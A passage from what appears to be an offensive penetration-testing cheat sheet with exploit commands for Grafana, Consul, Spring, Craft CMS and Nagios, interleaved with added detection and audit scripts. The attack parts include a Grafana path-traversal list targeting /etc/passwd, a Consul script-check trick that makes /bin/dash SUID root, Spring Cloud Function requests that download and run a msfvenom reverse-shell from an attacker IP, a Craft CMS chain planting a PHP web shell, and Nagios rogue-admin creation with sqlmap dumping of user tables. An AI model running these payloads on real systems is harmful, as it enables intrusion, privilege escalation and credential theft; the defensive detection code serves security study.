/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd
```
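A defender's detection for the traversal above, added here as an example that is not part of the original page: it parses constructed combined-format access-log lines, strips (also double-encoded) percent-encoding, normalises `..` segments and flags any request under `/public/plugins/` whose real target leaves that directory. Log at Grafana itself or at the first proxy in front of it, since an upstream proxy may already have normalised the path.

```python
import re
import posixpath
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET /public/plugins/welcome/img/logo.png HTTP/1.1" 200 512
10.0.0.7 - - [10/Dec/2021:10:00:02 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1712
10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /public/plugins/mysql/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 9000
10.0.0.7 - - [10/Dec/2021:10:00:04 +0000] "GET /public/plugins/loki/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
10.0.0.9 - - [10/Dec/2021:10:00:05 +0000] "GET /api/dashboards/home HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PREFIX = "/public/plugins/"


def fully_decode(path, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches %252e double encoding)."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_plugin_traversal(raw_path):
    """True when a request under /public/plugins/ escapes that directory after normalisation."""
    path = fully_decode(raw_path.split("?", 1)[0])
    if not path.startswith(PLUGIN_PREFIX):
        return False
    # Collapse '.' and '..' segments; an escaped path no longer starts with the plugin prefix.
    return not posixpath.normpath(path).startswith(PLUGIN_PREFIX)


def find_traversal_attempts(log_text):
    """(client ip, status, resolved target path) for every traversal attempt, whatever the status."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_plugin_traversal(m["path"]):
            findings.append((m["ip"], m["status"], posixpath.normpath(fully_decode(m["path"]))))
    return findings
```

A 404 on an escaped path still counts: it is the same probe against a patched instance.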

## 08. Consul

```bash
## ------------------| Script check abuse (needs an agent that allows script checks and a token with service:write)
## The agent runs the check's "Args" on every interval as its own user, here root, so the script's chmod lands.
echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
## After the first interval (10s) /bin/dash is SUID root
dash -p
```
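A defender-side audit of the misconfiguration this relies on, added here as an example that is not part of the original page: it flags `enable_script_checks`, missing or permissive ACLs, and registrations whose check executes a command, with extra weight when the script lives in a world-writable directory. The agent configs and registration payloads are constructed; `enable_script_checks`, `enable_local_script_checks` and `acl.default_policy` are real Consul agent options.

```python
# Constructed Consul agent configurations and service registrations (not taken from a real host).
AGENT_CONFIG_WEAK = {"enable_script_checks": True, "acl": {"enabled": False}}
AGENT_CONFIG_HARDENED = {
    "enable_script_checks": False,
    "enable_local_script_checks": True,  # script checks only from local config files, never via the HTTP API
    "acl": {"enabled": True, "default_policy": "deny"},
}
# Payloads in the shape accepted by PUT /v1/agent/service/register (Consul decodes keys case-insensitively).
REGISTRATIONS = [
    {"ID": "web", "Name": "web", "Port": 80,
     "check": {"HTTP": "http://127.0.0.1:80/health", "interval": "10s"}},
    {"ID": "meow", "Name": "meow", "Port": 80,
     "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}},
]
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")


def get_ci(d, key):
    """Case-insensitive lookup, mirroring how Consul decodes JSON field names."""
    return next((v for k, v in d.items() if k.lower() == key.lower()), None)


def audit_agent_config(cfg):
    """Findings about settings that let an API client turn a service check into command execution."""
    findings = []
    if cfg.get("enable_script_checks"):
        findings.append("enable_script_checks=true: any token with service:write can register a command-running check")
    acl = cfg.get("acl", {})
    if not acl.get("enabled"):
        findings.append("ACLs disabled: anyone who can reach the agent API may register services")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("acl.default_policy is not 'deny'")
    return findings


def script_checks(registrations):
    """(service id, argv, script in world-writable dir) for every registration carrying a script check."""
    found = []
    for reg in registrations:
        checks = get_ci(reg, "checks") or [get_ci(reg, "check") or {}]
        for chk in checks:
            args = get_ci(chk, "args")
            if args:
                risky = any(a.startswith(WORLD_WRITABLE) for a in args)
                found.append((get_ci(reg, "id") or get_ci(reg, "name"), args, risky))
    return found
```

The same `script_checks` logic applies to the live output of `GET /v1/agent/services` once the service definitions are pulled from the agent.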

## 09. Spring Framework

* [Spring4Shell \[CVE-2022-22965\]](https://github.com/sunnyvale-it/CVE-2022-22965-PoC)

```bash
### Spring Boot version 2.6.5
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/
```

* Spring Cloud Function SpEL injection \[CVE-2022-22963]

```bash
## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection
```

## 10. Craft CMS

* [CVE-2023-41892](https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892)

```bash
## ------------------| Versions between 4.0.0-RC1 – 4.4.14
## Check for phpinfo
curl -sk "https://craftcms-vuln.ddev.site" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'

## ------------------| RCE Path
## Create the h4rithd.msl file (ImageMagick MSL script: reads the PNG and writes it into the webroot as PHP)
cat > h4rithd.msl <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<image>
 <read filename="http://attacker_ip:8000/vuln.png" />
 <write filename="/var/www/html/web/shell.php" />
</image>
EOF

## ------------------| Create the vuln.png
exiftool -comment="<?php phpinfo(); ?>" vuln.png

## ------------------| Exploit
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -H 'Content-Type: multipart/form-data' -F 'action=conditions/render' -F 'configObject[class]=craft\elements\conditions\ElementCondition' -F 'config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}' -F 'filename=@h4rithd.msl'
curl -sk "http://surveillance.htb" -x localhost:8080 -X POST -d 'action=conditions/render&configObject[class]=craft\elements\conditions\ElementCondition&config={"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:/tmp/php*"}}}'
curl -k "http://surveillance.htb/shell.php" -x localhost:8080 --output -

## ------------------| Metasploit
## Note: cmsms_* modules target CMS Made Simple, not Craft CMS; confirm the right module with `search craft` in msfconsole
use exploit/multi/http/cmsms_object_injection_rce
set RHOSTS <IP>
set ForceExploit true
exploit
```
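Detection for the two request patterns in the Spring Cloud Function and Craft CMS sections above (the `spring.cloud.function.routing-expression` header abused in CVE-2022-22963, and the `conditions/render` request with an attacker-chosen `configObject[class]` used in CVE-2023-41892), added here as an example that is not part of the original page. It assumes a reverse proxy or WAF that logs request headers and bodies as records; the records are constructed, and the multipart variant shown above would need a multipart parser that this omits.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Constructed request records, in the shape a proxy or WAF that logs headers and bodies might emit.
SAMPLE_RECORDS = [
    {"src": "10.0.0.7", "method": "POST", "path": "/functionRouter",
     "headers": {"spring.cloud.function.routing-expression":
                 'T(java.lang.Runtime).getRuntime().exec("id")',
                 "Content-Type": "application/x-www-form-urlencoded"}, "body": ""},
    {"src": "10.0.0.8", "method": "POST", "path": "/functionRouter",
     "headers": {"Content-Type": "text/plain"}, "body": "hello"},
    {"src": "10.0.0.9", "method": "POST", "path": "/index.php",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "action=conditions/render&configObject[class]=craft%5Celements%5Cconditions%5CElementCondition"
             "&config=%7B%22as+%22%3A%7B%22class%22%3A%22Imagick%22%7D%7D"},
    {"src": "10.0.0.10", "method": "POST", "path": "/index.php",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": "action=users%2Flogin&loginName=bob"},
]

SPRING_HEADER = "spring.cloud.function.routing-expression"
# SpEL type references and process-spawning classes have no place in a routing expression sent by a client.
SPEL_RE = re.compile(r"T\s*\(|java\.lang\.Runtime|ProcessBuilder|ScriptEngine")


def classify(rec):
    """Names of the rules that fire for one request record."""
    hits = []
    headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
    expr = headers.get(SPRING_HEADER)
    if expr is not None:  # the header is meant to be set server-side, so its mere presence is suspicious
        hits.append("spring-routing-expression-header")
        if SPEL_RE.search(unquote_plus(expr)):
            hits.append("spel-type-reference")
    if rec.get("method") == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        fields = dict(parse_qsl(rec.get("body", ""), keep_blank_values=True))
        # Craft CMS 4.0.0-RC1 to 4.4.14: conditions/render with a caller-supplied configObject[class]
        if fields.get("action") == "conditions/render" and any(k.startswith("configObject[") for k in fields):
            hits.append("craftcms-conditions-render-object-injection")
    return hits


def scan(records):
    """(source, rule hits) for every record that triggered at least one rule."""
    return [(r["src"], hits) for r in records if (hits := classify(r))]
```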

## 11. Nagios

```bash
## ------------------| Authenticate with API
### Create token
curl -ksX POST https://<HOST>/nagiosxi/api/v1/authenticate -d 'username=<USER>&password=<PASS>&valid_min=500'
### Login to the server
https://<HOST>/nagiosxi/?token=<TOKEN>
### Add new user
curl -XPOST --insecure "https://<HOST>/nagiosxi/api/v1/system/user?apikey=<KEY>&pretty=1" -d "username=h4rithd&password=h4rithd&name=h4rithd&email=h4rithd@localhost&auth_level=admin"
### Login using h4rithd:h4rithd creds

### Use sqlmap to get the admin API key
sqlmap -u "https://<HOST>/nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=<AUTH_TOKEN>" --level 5 --risk 3 -p id --batch -D nagiosxi --dump -T xi_users
```

<details>

<summary>Remote Code Execution</summary>

![](/files/opgK0kMDbqRtGQ0RjEqD)![](/files/f7YbDmBEK05vPUBodvs3)![](/files/Gm2ARhxV4vD4AXiDQMMF)![](/files/LjUHFBfQ1hJA10Jht0X6)![](/files/Fkm7dLSgxKQUAVlAcJgo)

</details>

